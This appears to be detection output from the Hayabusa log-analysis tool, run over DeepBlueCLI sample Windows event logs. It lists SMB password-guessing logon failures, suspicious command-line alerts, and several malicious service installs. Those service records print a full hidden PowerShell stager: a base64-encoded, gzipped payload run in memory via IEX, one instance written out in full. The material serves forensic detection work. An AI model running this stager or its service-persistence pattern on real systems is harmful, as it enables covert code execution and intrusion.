NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:48.752 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XNXwYS73RElHozUo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:48.793 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ft1MLPJISeq0bMsa | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:48.845 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: i8kbFOwQiCyRVMDV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:48.879 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ToPzuDEmXN1fjIcS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:48.924 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pKF1QKEuTXIGnrx2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:48.964 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fyHpo6pX8TEo6ttv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:49.000 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3uYqEt90yr8B3rK9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:49.048 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2LKkrM0slVn0CKHw | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:49.080 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TyJ82cfaddnc8c6D | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:49.120 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KJRw0S82SupmuS4Y | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:49.161 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: z4lSo9BMWdcPLfLb | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:49.208 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XreSLg472qhJw0R3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:49.266 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KIJcQJKLmnjrE2T9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:49.309 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zlddo3GCTEIkFyi9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:49.359 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hxiZoB5mHR2tGUFM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:49.399 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fpEbpiox2Q3Qf8av | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:54:20.959 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\rundll32.exe aepdu.dll,AePduRunUpdate | Path: C:\Windows\System32\rundll32.exe | PID: 0x438 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-20 01:55:28.022 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0x338 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-20 01:55:39.187 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: 
C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0x658 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-20 02:43:48.712 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe"" /noconfig /fullpaths @""C:\Users\IEUser\AppData\Local\Temp\8xpeyiyp.cmdline"" | Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe | PID: 0xbf4 | User: IEUser | LID: 0x6590f",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-20 02:43:48.834 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe"" /noconfig /fullpaths @""C:\Users\IEUser\AppData\Local\Temp\ud-vxj7k.cmdline"" | Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe | PID: 0x840 | User: IEUser | LID: 0x6590f",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-20 02:43:49.017 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe"" /noconfig /fullpaths @""C:\Users\IEUser\AppData\Local\Temp\gsxogihi.cmdline"" | Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe | PID: 0x2f8 | User: IEUser | LID: 0x6590f",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-20 02:43:49.106 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe"" /noconfig 
/fullpaths @""C:\Users\IEUser\AppData\Local\Temp\owummvtl.cmdline"" | Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe | PID: 0xe48 | User: IEUser | LID: 0x6590f",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-20 02:43:49.183 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\rundll32.exe /d acproxy.dll,PerformAutochkOperations | Path: C:\Windows\System32\rundll32.exe | PID: 0xe8c | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-20 02:43:49.891 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\PING.EXE"" ""Local CMOS Clock"" /n 2 | Path: C:\Windows\System32\PING.EXE | PID: 0xfb0 | User: IEUser | LID: 0x6590f",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-20 02:43:49.912 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\PING.EXE"" time.windows.com /n 2 | Path: C:\Windows\System32\PING.EXE | PID: 0x184 | User: IEUser | LID: 0x6590f",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-20 05:36:09.147 +09:00,IE10Win7,7045,high,Persis,Suspicious Service Installed,"Svc: zIGuwymOgHZnXZPm | Path: %COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object 
IO.MemoryStream(,[Convert]::FromBase64String(''[base64 payload omitted]''));IEX (New-Object IO.StreamReader(New-Object
IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s); | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 2016-09-20 05:36:09.147 +09:00,IE10Win7,7045,high,Persis,Malicious Service Possibly Installed,"Svc: zIGuwymOgHZnXZPm | Path: %COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''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''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 2016-09-20 05:36:09.147 +09:00,IE10Win7,7045,info,,New Service Installed,"Name: zIGuwymOgHZnXZPm | Path: %COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object 
IO.MemoryStream(,[Convert]::FromBase64String(''[base64 payload omitted]''));IEX (New-Object IO.StreamReader(New-Object
IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s); | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 2016-09-20 05:36:09.237 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''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''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s); | Path: C:\Windows\System32\cmd.exe | PID: 0x108 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-20 05:36:09.334 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''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''));IEX (New-Object IO.StreamReader(New-Object 
IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s); | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xd94 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-20 05:36:10.592 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""powershell.exe"" -nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String('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'));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd(); | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xc10 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-20 05:38:04.034 +09:00,IE10Win7,7045,high,Persis,Suspicious Service Installed,"Svc: DrzkXznQhkKgYssd | Path: %COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''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''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s); | Account: LocalSystem | Start Type: 
demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 2016-09-20 05:38:04.034 +09:00,IE10Win7,7045,high,Persis,Malicious Service Possibly Installed,"Svc: DrzkXznQhkKgYssd | Path: %COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''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''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 2016-09-20 05:38:04.034 +09:00,IE10Win7,7045,info,,New Service Installed,"Name: DrzkXznQhkKgYssd | Path: %COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object 
IO.MemoryStream(,[Convert]::FromBase64String(''[base64 payload omitted]''));IEX (New-Object IO.StreamReader(New-Object
IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s); | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 2016-09-20 05:38:04.041 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''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''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s); | Path: C:\Windows\System32\cmd.exe | PID: 0xc40 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-20 05:38:04.087 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''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''));IEX (New-Object IO.StreamReader(New-Object 
IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s); | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xe64 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-20 05:38:04.643 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""powershell.exe"" -nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String('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'));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd(); | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xa3c | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-20 05:59:41.659 +09:00,IE10Win7,7045,high,Persis,Suspicious Service Installed,"Svc: TDhDnlnsrKrQVnjY | Path: %COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object 
IO.MemoryStream(,[Convert]::FromBase64String(''[base64 payload omitted]''));IEX (New-Object IO.StreamReader(New-Object
IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s); | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 2016-09-20 05:59:41.659 +09:00,IE10Win7,7045,high,Persis,Malicious Service Possibly Installed,"Svc: TDhDnlnsrKrQVnjY | Path: %COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIALxR4FcCA7VWf2/aSBD9O5X6HawKCVslGAhpmkiVbo0xEDABHCCGotPGXpuFxUvs5Wev3/3GYDdUTar0pLMSseuZ2X375s2OvVXgCMoDaYltQ/r2/t1ZB4d4IckZl667NmZ2Tsp4wa7aLClnZ2DOrM1OoNXYcqTXpC+SPEbLpc4XmAaTm5vKKgxJII7zfI0IFEVk8cgoiWRF+kcaTklIzu8eZ8QR0jcp83e+xvgjZonbroKdKZHOUeDGthZ3cIwtby0ZFXL269esMj4vTvLVpxVmkZy1dpEgi7zLWFaRvivxhve7JZGzJnVCHnFP5Ic0uCjl+0GEPdKG1dbEJGLK3SirwGHgLyRiFQbS6bHidY5echaGnZA7yHVDEkFQvhGs+ZzImWDFWE76Sx4nIHqrQNAFAbsgIV9aJFxTh0T5Og5cRnrEm8htsknP/tYg+TQIvDoiVHKQnNfRmtxdMXJcIKv8ivdHXhV4nnMLbHx//+79Oy/VQ3TZs4K/69v1qShgdDY+jAkAljs8ogfnL1IhJ5mwJxY83ME0cx+uiDKRxnE+xpOJlGHuZTn3enwxdQbXPbl4uIR34wGn7gRiklRlvO4wWG/KmMbG13WnE48GRN8FeEGdVFryS/QTj5HDcfOpWxugydnEQFydMOJjETOZk8a/hlUXVPyI1VaUuSREDqQwAlSQXeVnMMfkyNlGYJIFMHWcZ+M0gKBJ6p2IeJfuHs/BKVthOIpyUmcFFeXkJItgRtychIKIJia0EvwwzD7DNVdMUAdHIl1uovxEZrJphQeRCFcOZBAIuLeWxKGYxXzkpDp1ibazqJ9unn2RjQpmjAY+rLSGbMCbmAVLxLoIAedBA0reIqKxWDKyAJ9DfRsM+1DNSTEchIR94mZfhJlK/ajrmJWUjhOQkGqLcZGTBjQUcFfEDB9U9d9AnFwTz3AqIUlSI6fFM9Z2IlZ7ZtrdOsOeE8s0YenASSiADyPkCw1H5FPZEiGwJX9Q72gFwWM3AmY62pwW0YYWGyb89+lFg+tXbvN2VldDfTv1UCNqmPWO3q3Xy+tba1AWVrUhm
p2GMKsPs5mF6r2+LUYNVL+nhbld3i9v6d5qIdfeqp/22n5T0Lb7me96tu55/pVn9YqXBm0NK12tUMItvbpqDbWNVihHVbqpd2m/O781xKM9YLjvqf5D8RrTbSucDYrc3DcQqk0vnP2tN6hNTXdn19XrYXmOqghVgurA0HjT1kLUUQfYH/BNc1ZjQ7+CNMOhZNTtG1q3a2ioX5s96deqD7EPeKoNByU6Wj70pjA3AEJTLZQbLtlzuwsk1TjCfg98/ErJmXrgo39E2sc2j0p4rnGkgY8xegJc9tLoMLDf90scDVj7AaPWaGeoatHulFG9QIc1H8VLYl/rYhSt9b2uFgcud4eXbdtTBw/sStUr90vHU1V1U9ebzqi4/Xx3VdYKT5UFXbDHkqte9z9rwabpd9a+2x1e9bbt3SPs11fVwYdYOyCezGJ2vTSvTtTw2r1v4jCaYgYqgZs8LVeDh0ZyK3c4jSNk+dCt5yQMCIP2Bg0wVTpijDtxi3i+v6FHHTvHBIq2D8OL0osjRfrhqDw3jvTVzc0IoEL9JNrOt0jgi2musL0oFOD2L2zLBTjv209Y4cudnK6WixtIwtPJHuywhxLXVsaf96In1Pp/WUyKego/7ptYfH73G+ubmC3k0vP/Yvj5xR+x/McMDDEV4GnBzcTIsV3+hohEOSffGUmaQBde8sQffncrcd6GL5B/AQG25GNvCgAA''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 2016-09-20 05:59:41.659 +09:00,IE10Win7,7045,info,,New Service Installed,"Name: TDhDnlnsrKrQVnjY | Path: %COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''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''));IEX (New-Object 